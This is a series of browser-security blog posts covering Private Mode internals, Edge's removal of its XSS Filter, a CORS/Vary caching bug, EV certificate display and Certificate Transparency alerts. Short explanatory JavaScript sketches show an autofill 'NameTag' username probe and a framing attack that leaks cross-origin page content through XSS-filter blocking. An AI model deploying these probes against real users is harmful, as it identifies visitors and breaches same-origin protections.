browsers, perf, privacy, security

Private Mode Browsers

Safari introduced a privacy mode back in 2005, and InPrivate Mode followed in Internet Explorer 8 with the goal of helping users improve their privacy against both local and remote threats.

All leading browsers offer a “Private Mode” and they all behave in the same general ways.

HTTP Caching

While in Private mode, browsers typically ignore any previously cached resources and cookies. Similarly, the Private mode browser does not preserve any cached resources beyond the end of the browser session. These features help prevent a revisited website from trivially identifying a returning user (e.g. if the user’s identity were cached in a cookie or JSON file on the client) and help prevent “traces” that might be seen by a later user of the device.

In Firefox’s and Chrome’s Private modes, a memory-backed cache container is used for the HTTP cache, and its memory is simply freed when the browser session ends. Unfortunately, WinINET never implemented a memory cache, so in Internet Explorer InPrivate sessions, data is cached in a special WinINET cache partition on disk which is “cleaned up” when the InPrivate session ends.

Because this cleanup process may be unreliable, in 2017, Edge made a change to simply disable the cache while running InPrivate, a design decision with significant impact on the browser’s network utilization and performance. For instance, consider the scenario of loading an image gallery that shows one large picture per page and clicking “Next” ten times:

[Image: chart comparing network requests and bytes downloaded, InPrivate vs. regular browsing]

Because the gallery reuses some CSS, JavaScript, and images across pages, disabling the HTTP cache means that these resources must be re-downloaded on every navigation, resulting in 50 additional requests and a 118% increase in bytes downloaded for those eleven pages. Sites that reuse even more resources across pages will be more significantly impacted.
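
(Rough arithmetic, assuming the retransfers were spread evenly: 50 extra requests across ten “Next” navigations implies about five shared subresources re-downloaded on every page, requests that the HTTP cache would otherwise have absorbed entirely.)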

Another interesting quirk of Edge’s InPrivate implementation is that the browser will not download FavIcons while InPrivate. Surprisingly (and likely accidentally), the suppression of FavIcon downloads also occurs in any non-InPrivate windows so long as any InPrivate window is open on the system.

Web Platform Storage

Akin to the HTTP caching and cookie behaviors, browsers running in Private mode must restrict access to web platform storage (e.g. HTML5 localStorage, ServiceWorker/CacheAPI, IndexedDB) to help prevent association/identification of the user and to avoid leaving traces behind locally. In some browsers and scenarios, storage mechanisms are backed by an “ephemeral partition” that is discarded when the session ends, while in others the DOM APIs providing access to storage are simply configured to return “Access Denied” errors.

You can explore the behavior of various storage mechanisms by loading this test page in Private mode and comparing to the behavior in non-Private mode.
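
If you don’t have such a test page handy, a minimal probe along the following lines shows the idea (illustrative only; the exact failure modes and error types vary by browser and version):

async function probeStorage() {
  const results = {};

  // localStorage: Private modes may make this ephemeral or block writes outright.
  try {
    localStorage.setItem('probe', '1');
    localStorage.removeItem('probe');
    results.localStorage = 'writable';
  } catch (e) {
    results.localStorage = 'blocked (' + e.name + ')';
  }

  // IndexedDB: some Private modes hide it entirely; others fail the open request.
  results.indexedDB = await new Promise((resolve) => {
    try {
      const req = indexedDB.open('probe');
      req.onsuccess = () => resolve('available');
      req.onerror = () => resolve('blocked (' + req.error + ')');
    } catch (e) {
      resolve('blocked (' + e.name + ')');
    }
  });

  // CacheAPI: requires a secure context and may be unavailable in Private mode.
  try {
    await caches.open('probe');
    results.cacheAPI = 'available';
  } catch (e) {
    results.cacheAPI = 'blocked (' + e.name + ')';
  }

  return results;
}

probeStorage().then((r) => console.table(r));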

Within IE and Edge’s InPrivate mode, localStorage uses an in-memory store that behaves exactly like the sessionStorage feature. This means that InPrivate’s storage is (incorrectly) not shared between tabs, even tabs in the same browser instance.

Network Features

Beyond the typical Web Storage scenarios, browsers’ Private Modes should also undertake efforts to prevent association of users’ Private-instance traffic with non-Private-instance traffic. Impacted features include anything with a component that behaves “like a cookie,” including TLS Session Tickets, TLS Resumption, HSTS directives, TCP Fast Open, Token Binding, ChannelID, and the like.

Automatic Authentication

In Private mode, a browser’s AutoComplete features should be set to manual-fill mode to prevent a “NameTag” vulnerability, whereby a site can simply read an auto-filled username field to identify a returning user.
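
The probe is trivial to sketch (the field name and timing below are illustrative, and whether a given browser will silently fill such a field varies):

// Hypothetical "NameTag" probe: an off-screen login field that the browser's
// AutoComplete may fill without any user interaction.
const probe = document.createElement('input');
probe.name = 'username';               // matches a field the browser has saved
probe.autocomplete = 'username';
probe.style.position = 'absolute';
probe.style.left = '-9999px';          // visually hidden, but still fillable
document.body.appendChild(probe);

setTimeout(() => {
  if (probe.value) {
    // The browser volunteered a stored credential: the visitor is identified.
    console.log('Returning user:', probe.value);
  }
}, 2000); // autofill may occur asynchronously, well after page load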

On Windows, most browsers support silent and automatic authentication using the current user’s Windows login credentials and either the NTLM or Kerberos scheme. Typically, browsers are only willing to automatically authenticate to sites on “the Intranet.“ Some browsers behave differently when in Private mode, preventing silent authentication and forcing the user to manually enter or confirm an authentication request.

In Firefox Private Mode and Edge InPrivate, the browser will not automatically respond to an HTTP/401 challenge for Negotiate/NTLM credentials.

In Chrome Incognito, Brave Incognito, and IE InPrivate, the browser will automatically respond to an HTTP/401 challenge for Negotiate/NTLM credentials even in Private mode.

Notes:

  • In Edge, the security manager returns MustPrompt when queried for URLACTION_CREDENTIALS_USE.
  • Unfortunately, Edge’s Kiosk mode runs InPrivate, meaning you cannot easily use Kiosk mode to implement a display that projects a dashboard or other authenticated data on your Intranet.
  • For Firefox to support automatic authentication at all, the network.negotiate-auth.allow-non-fqdn and/or network.automatic-ntlm-auth.allow-non-fqdn preferences must be adjusted.

Detection of Privacy Modes

While browsers generally do not try to advertise to websites that they are running inside Private modes, it is relatively easy for a website to feature-detect this mode and behave differently. For instance, some websites like the Boston Globe block visitors in Private Mode (forcing login) because they want to avoid circumvention of their “Non-logged-in users may only view three free articles per month” paywall logic.

Sites can detect privacy modes by looking for the behavioral changes that signal that a given browser is running in Private mode; for instance, indexedDB is disabled in Edge while InPrivate. Detectors have been built for each browser and wrapped in simple JavaScript libraries. Defeating Private mode detectors requires significant investment on the part of browsers (e.g. “implement an ephemeral mode for indexedDB”) and as a consequence most browsers have punted on this problem for the time being.
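
For example, a detector keyed off that Edge behavior might look something like the following (illustrative only; detection heuristics are browser- and version-specific and break as browsers change):

// Naive Private-mode detection of the sort such libraries perform.
// In Edge (and IE 10+) InPrivate, indexedDB is not exposed to pages at all.
function probablyInPrivate() {
  return !window.indexedDB;
}

if (probablyInPrivate()) {
  // e.g. force login instead of counting free articles, as described above
  console.log('Private mode suspected; applying stricter paywall rules.');
}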

Advanced Private Modes

Generally, mainstream browsers have taken a middle ground in their privacy features, trading off some performance and some convenience for improved privacy. Users who are very concerned about maintaining privacy from a wider variety of threat actors need to take additional steps, like running their browser in a discardable Virtual Machine behind an anonymizing VPN/Proxy service, disabling JavaScript entirely, etc.

The Brave Browser offers a “Private Window with Tor” feature that routes traffic over the Tor anonymizing network; for many users this might be a more practical choice than the highly privacy-preserving Tor Browser Bundle, which offers additional options like built-in NoScript support to help protect privacy.


-Eric

browsers, security, storytelling

An Update on the Edge XSS Filter

In Windows 10 RS5 (aka the “October 2018 Update”), the venerable XSS Filter, first introduced in 2008 with IE8, was removed from Microsoft Edge. The XSS Filter debuted in a time before Content Security Policy, as part of a basket of new defenses designed to blunt the growing exploitation of cross-site scripting attacks, joining older features like HTTPOnly cookies and the sandbox attribute for IFRAMEs.

The XSS Filter feature was a difficult one to land: only through the sheer brilliance and dogged persistence of its creator (David Ross) did the IE team accept the proposal that a client-side filtering approach could be effective with a reasonable false-positive rate and good-enough performance to ship on-by-default. The filter was carefully tuned, firing only on cross-site navigation, and it needed frequent updates as security researchers inside and outside the company found tricks to bypass it. One of the most significant technical challenges concerned how the filter was layered into the page-download pipeline, intercepting documents as they were received as raw text from the network. The filter relied on evaluating dynamically-generated regular expressions to look for potentially-executable markup in the response body that could have been reflected from the request URL or POST body. Evaluating those regular expressions could prove extremely expensive in degenerate cases (multiple seconds of CPU time in the worst cases) and required ongoing tweaks to keep the performance costs in check.

In 2010, the Chrome team shipped their similar XSS Auditor feature, which had the luxury of injecting its detection logic after the HTML parser runs, detecting and blocking reflections as they entered the script engine. By operating closer to the point of vulnerability, its performance and accuracy were significantly improved over the XSS Filter’s.

Unfortunately, no matter how you implement it, client-side XSS filtration is inherently limited: of the four classes of XSS attack, only one (reflected XSS) is potentially mitigated by client-side filtration. Attackers have the luxury of tuning their attacks to bypass filters before deploying them to the world, and the relatively slow ship cycles of browsers (6 weeks for Chrome, and at least a few months for IE of the era) meant that bypasses remained exploitable for a long time.

False positives are an ever-present concern: they meant that the filters had to be somewhat conservative, leading to false-negative bypasses (e.g. multi-stage exploits that performed a same-site navigation) and pronouncements that certain attack patterns were simply out-of-scope (e.g. attacks encoded in anything but the most popular encoding formats).

Early attempts to mitigate the impact of false positives (by default, neutering exploits rather than blocking navigation entirely) proved bypassable and later were abused to introduce XSS exploits in sites that would otherwise be free of exploit (!!!). As a consequence, browsers were forced to offer options that would allow a site to block navigation upon detection of a reflection, or disable the XSS filter entirely.

Surprisingly, even in the ideal case, best-of-class XSS filters can introduce information disclosure exploits into sites that are free of XSS vulnerabilities. XSS filters work by matching attacker-controlled request data to text in a victim response page, which may be cross-origin. Clientside filters cannot really determine whether a given string from the request was truly reflected into the response, or whether the string is naturally present in the response. This shortcoming creates the possibility that such a filter may be abused by an attacker to determine the content of a cross-origin page, a violation of Same Origin Policy. In a canonical attack, the attacker frames a victim page with a string of interest in it, then attempts to determine that string by making a series of successive guesses until it detects blocking by the XSS filter. For instance, xoSubframe.contentWindow.length exposes the count of subframes of a frame, even cross-origin. If the XSS filter blocks the loading of a frame, its subframe count is zero and the attacker can conclude that their guess was correct.
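
A sketch of that canonical probe follows (the victim URL, query parameter, and guess values are hypothetical placeholders):

// Frame the victim page with an attacker-chosen guess in the URL. If the
// XSS filter "detects" the guess reflected in the page and blocks loading,
// the framed document has zero subframes, a fact that is readable even
// cross-origin via window.length.
function frameCountAfterGuess(guess) {
  return new Promise((resolve) => {
    const xoSubframe = document.createElement('iframe');
    xoSubframe.src = 'https://victim.example/page?q=' + encodeURIComponent(guess);
    xoSubframe.onload = () => {
      resolve(xoSubframe.contentWindow.length); // subframe count, readable cross-origin
      xoSubframe.remove();
    };
    document.body.appendChild(xoSubframe);
  });
}

// If a guess yields 0 while a control string yields a non-zero count,
// the filter fired, so the guess likely appears in the victim page.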

In Windows 10 RS4 (April 2018 update), Edge shipped its implementation of the Fetch standard, which redefines how the browser downloads content for page loads. As a part of this massive architectural shift, a regression was introduced in Edge’s XSS Filter that caused it to incorrectly determine whether a navigation was cross-origin. As a result, the XSS Filter began running its logic on same-origin navigations and skipping processing of cross-origin navigations, leading to a predictable flood of bug reports.

In the process of triaging these reports and working to address the regression, we concluded that the XSS Filter had long been on the wrong side of the cost/benefit equation and we elected to remove the XSS Filter from Edge entirely, matching Firefox (which never shipped a filter to begin with).

We encourage sites that are concerned about XSS attacks to use the client-side platform features available to them (Content-Security-Policy, HTTPOnly cookies, sandboxing) and the server-side patterns and frameworks that are designed to mitigate script injection attacks.

-Eric Lawrence

browsers, security, web

CORS and Vary

Yesterday, I started looking at a site-compatibility bug where a page’s layout is intermittently busted. Popping open the F12 Tools on the failing page, we see that a stylesheet is getting blocked because it lacks a CORS Access-Control-Allow-Origin response header:

[Image: F12 Network tool showing the stylesheet blocked for lacking an Access-Control-Allow-Origin header]

We see that the client demands the header because the LINK element that references it includes a crossorigin="anonymous" attribute:

<link rel="stylesheet" crossorigin="anonymous" href="//s.axs.com/axs/css/90a6f65.css?4.0.1194" type="text/css" />

Aside: It’s not clear why the site is using this attribute. CORS is required to use SubResource Integrity, but this resource does not include an integrity attribute. Perhaps the goal was to save bandwidth by not sending cookies to the “s” (static content) domain?

In any case, the result is that the stylesheet sometimes fails to load as you navigate back and forward.

Looking at the network traffic, we find that the static-content domain is trying to follow the best practice of including Vary: Origin when using CORS for access control.

Unfortunately, it’s doing so in a subtly incorrect way, which you can see when diffing two request/response pairs for the stylesheet:

[Image: diff of two request/response pairs for the stylesheet]

As you can see in the diff, the Origin token is added to the response’s Vary header only when the request specifies an Origin header. If the request doesn’t specify an Origin, the server returns a response that lacks the Access-Control-* headers and also omits the Vary: Origin header.

That’s a problem. If the browser has the variant without the Access-Control directives in its cache, it will reuse that variant in response to a subsequent request… regardless of whether or not the subsequent request has an Origin header.

The rule here is simple: if your server makes a decision about what to return based on what’s in an HTTP header, you need to include that header name in your Vary header, even if the request didn’t include that header.
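
A minimal sketch of the correct behavior in Node.js (the hostname in the allow-list is illustrative):

const http = require('http');

// Hypothetical allow-list; a real deployment would list its own origins.
const ALLOWED_ORIGINS = new Set(['https://www.axs.com']);

http.createServer((req, res) => {
  // Emit Vary unconditionally: this response varies by Origin even when the
  // current request happens not to include an Origin header.
  res.setHeader('Vary', 'Origin');

  const origin = req.headers.origin;
  if (origin && ALLOWED_ORIGINS.has(origin)) {
    res.setHeader('Access-Control-Allow-Origin', origin);
  }

  res.setHeader('Content-Type', 'text/css');
  res.end('/* stylesheet body */');
}).listen(8080);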

-Eric

PS: This seems to be a pretty common misconfiguration, which is mentioned in the fetch spec:


CORS protocol and HTTP caches

If CORS protocol requirements are more complicated than setting `Access-Control-Allow-Origin` to * or a static origin, `Vary` is to be used.

Vary: Origin

In particular, consider what happens if `Vary` is not used and a server is configured to send `Access-Control-Allow-Origin` for a certain resource only in response to a CORS request. When a user agent receives a response to a non-CORS request for that resource (for example, as the result of a navigation request), the response will lack `Access-Control-Allow-Origin` and the user agent will cache that response. Then, if the user agent subsequently encounters a CORS request for the resource, it will use that cached response from the previous non-CORS request, without `Access-Control-Allow-Origin`.

But if `Vary: Origin` is used in the same scenario described above, it will cause the user agent to fetch a response that includes `Access-Control-Allow-Origin`, rather than using the cached response from the previous non-CORS request that lacks `Access-Control-Allow-Origin`.

However, if `Access-Control-Allow-Origin` is set to * or a static origin for a particular resource, then configure the server to always send `Access-Control-Allow-Origin` in responses for the resource — for non-CORS requests as well as CORS requests — and do not use `Vary`.



browsers, security

Edge EV UI Requires SmartScreen

A user recently noticed that when loading Paypal.com in Microsoft Edge, the UI shown was the default HTTPS UI (a gray lock):

[Image: Edge showing the default gray lock UI for Paypal.com]

Instead of the fancier “green” UI shown for servers that present Extended Validation (EV) certificates:

[Image: Edge showing the green EV badge for Paypal.com]

The user observed this on some Windows 10 machines but not others.

The variable that differed between those machines was the state of the Menu > Settings > Advanced > Windows Defender SmartScreen setting.

Edge only shows the green EV user interface when SmartScreen is enabled.

IE 11

Internet Explorer 11 on Windows 10 behaves the same way as prior versions of IE going back to IE7: the green EV UI requires either that SmartScreen be enabled or that the option Tools > Internet Options > Advanced > Security > Check for Server Certificate Revocation be enabled.

Chrome

The Chrome team recently introduced a new setting, exposed via the chrome://flags/#simplify-https-indicator page, that controls how EV certificates are displayed in their Security Chip. A user (or a field trial) can configure sites with EV certificates to display using the default HTTPS UI.

[Image: Chrome’s simplify-https-indicator flag options]


-Eric

browsers, security

Stop Spilling the Beans

I’ve written about Same Origin Policy a bunch over the years, with a blog series mapping it to the Read/Write/Execute mental model.

More recently, I wrote about why Content-Type headers matter for same-origin-policy enforcement.

I’ve just read a great paper on cross-origin infoleaks and current/future mitigations. If you’re interested in browser security, it’s definitely worth a read.

browsers, dev, security

Building your .APP website with NameCheap and GitHub Pages–A Visual Guide

I recently bought a few new domain names under the brand-new .app top-level domain (TLD). The .app TLD is awesome because it’s on the HSTS Preload list, meaning that browsers will automatically use only HTTPS for every request on every domain under .app, keeping connections secure and improving performance.

I’m not doing anything terribly exciting with these domains for now, but I’d like to at least put up a simple welcome page on each one. In the old days of HTTP, this was trivial, but because .app requires HTTPS, I must get a certificate for each of my sites for them to load at all.

Fortunately, GitHub recently started supporting HTTPS on GitHub Pages with custom domains, meaning that I can easily get an HTTPS site up and running in just a few minutes.

1. Log into GitHub, go to your Repositories page and click New:

2. Name your new repository something reasonable:

3. Click to create a simple README file:

4. Edit the file

5. Click Commit new file

6. Click Settings on the repository

7. Scroll to the GitHub Pages section and choose master branch and click Save:

8. Enter your domain name in the Custom domain box and click Save

9. Login to NameCheap (or whatever DNS registrar you used) and click Manage for the target domain name:

10. Click the Advanced DNS tab:

11. Click Add New Record:


12. Enter four new A Records for the host @, using the list of IP addresses GitHub Pages uses:

13. Click Save All Changes.

14. Click Add New Record and add a new CNAME Record. Enter the host www and a target value of username.github.io. Click Save All Changes: 

15. Click the trash can icons to delete the two default DNS entries that NameCheap had for your domain previously:

16. Try loading your new site.

  • If you get a connection error, wait a few minutes for DNS to propagate and re-verify the DNS records you just added (a quick way to check them follows this list).
  • If you get a certificate error, look at the certificate. It’s probably the default GitHub certificate. If so, look in the GitHub Pages settings page and you may see a note that your certificate is awaiting issuance by LetsEncrypt.org. If so, just wait a little while.

  • After the certificate is issued, your site will load without errors:
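
To re-verify the A records from step 12 without waiting on your browser, a small Node.js sketch like the following works (assumes Node.js is installed; the expected addresses below are GitHub Pages’ documented set at the time of writing, so check GitHub’s current documentation before relying on them):

const { resolve4 } = require('dns').promises;

// GitHub Pages' documented A-record addresses at the time of writing.
const EXPECTED = [
  '185.199.108.153', '185.199.109.153',
  '185.199.110.153', '185.199.111.153',
];

resolve4('example.app') // replace with your own domain
  .then((records) => {
    console.log('A records:', records);
    const allPresent = EXPECTED.every((ip) => records.includes(ip));
    console.log(allPresent ? 'Records look right.' : 'Still propagating (or misconfigured)?');
  })
  .catch((err) => console.error('Lookup failed:', err.message));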


Go forth and build great (secure) things!

-Eric Lawrence

security

Fight Phish with Facebook (and Certificate Transparency)

As of April 30th, 2018, Chrome requires that all certificates issued by a public certificate authority be logged in multiple public Certificate Transparency (CT) logs, ensuring that anyone can audit all certificates that have been issued. CT logs allow site owners and security researchers to much more easily detect if a sloppy or compromised Certificate Authority has issued a certificate in error.

For instance, I own bayden.com, a site where I distribute freeware applications. I definitely want to hear about it if any CA issues a certificate for my site, because that’s a strong indication that my site’s visitors may be under attack. What’s cool is that CT also allows me to detect if someone got a certificate for a domain name that was suspiciously similar to my domain, for instance bȧyden.com.

Now, for the whole thing to work, I have to actually pay attention to the CT logs, and who’s got time for that? Someone else’s computer, that’s who.

The folks over at Facebook Security have built an easy-to-use interface that allows you to subscribe to notifications any time a domain you care about has a new certificate issued. Just enter a hostname and decide what sorts of alerts you’d like:

[Image: Facebook’s Certificate Transparency Monitoring subscription page]

You can even connect their system to webhooks if you’re looking for something more elaborate than email, although mail works just fine for me:

[Image: example email notification listing newly-issued certificates]
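
If you do wire up a webhook, the receiving end can be as simple as the Node.js sketch below; note that the payload shape shown is a guess, so consult the service’s documentation for the actual format:

const http = require('http');

http.createServer((req, res) => {
  let body = '';
  req.on('data', (chunk) => { body += chunk; });
  req.on('end', () => {
    try {
      // Hypothetical payload shape ({ domain: ... }); the real fields may differ.
      const alert = JSON.parse(body);
      console.log('New certificate observed for', alert.domain);
    } catch (e) {
      // Ignore pings that aren't JSON.
    }
    res.writeHead(200);
    res.end('ok');
  });
}).listen(8080);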

Beyond Facebook, there will likely be many other CT Monitoring services coming online over the next few years. For instance, the good folks at Hardenize have already integrated one into their broader security monitoring platform.

The future is awesome.

-Eric
